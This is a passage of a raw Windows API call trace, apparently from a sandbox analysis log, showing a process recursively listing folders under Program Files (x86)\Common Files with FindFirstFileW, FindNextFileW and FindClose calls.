FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.165] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.166] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.166] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.167] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.167] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.167] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.167] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.167] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.167] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.168] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.168] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.168] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.168] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.169] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.169] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.169] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.169] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.169] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.169] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.169] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.169] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.170] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.170] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.170] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.170] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.170] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.170] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.170] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.171] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.171] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.171] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.171] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.171] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.172] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.172] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.172] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.172] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.173] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.173] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.173] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.173] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.173] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.173] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.173] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.173] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.173] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.173] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.174] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.174] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.174] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.174] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.175] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.175] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.175] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.175] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.175] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.175] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.175] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.175] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.175] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.176] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.176] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.176] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.176] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.176] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.176] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0139.176] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0139.176] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0139.176] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0139.176] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.176] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.177] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.177] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.177] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.177] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.177] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.177] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.177] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0139.177] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0139.177] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0139.177] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0139.177] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.177] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.177] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.178] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0139.178] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.178] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.179] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.179] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.179] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.180] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.180] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.180] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.180] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.180] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.180] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.180] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.180] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.180] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.180] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.181] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.181] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.181] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.181] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.181] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.182] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.182] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.182] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.182] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.182] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.182] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.182] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.182] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.182] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.182] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.183] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.183] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.183] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.183] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.183] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.183] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.183] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.183] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.183] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.183] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.184] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.184] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.184] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.184] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.184] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.184] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.185] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.185] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.185] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.185] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.185] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.185] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.185] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.185] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.185] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.185] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.185] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.185] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.185] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.187] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.187] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.188] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.188] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.188] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.189] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.189] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.189] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.189] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.189] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.190] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.190] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.190] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.190] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.190] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.191] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.191] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.194] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.194] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.194] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.194] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.195] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.195] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.195] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.195] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.195] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.195] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.195] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.195] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.195] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.195] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.195] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.196] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.196] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.196] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.196] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.196] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.196] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0139.196] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0139.197] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0139.197] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0139.197] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.197] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0139.197] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0139.198] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0139.198] FindNextFileW (in: hFindFile=0x3a2e80, 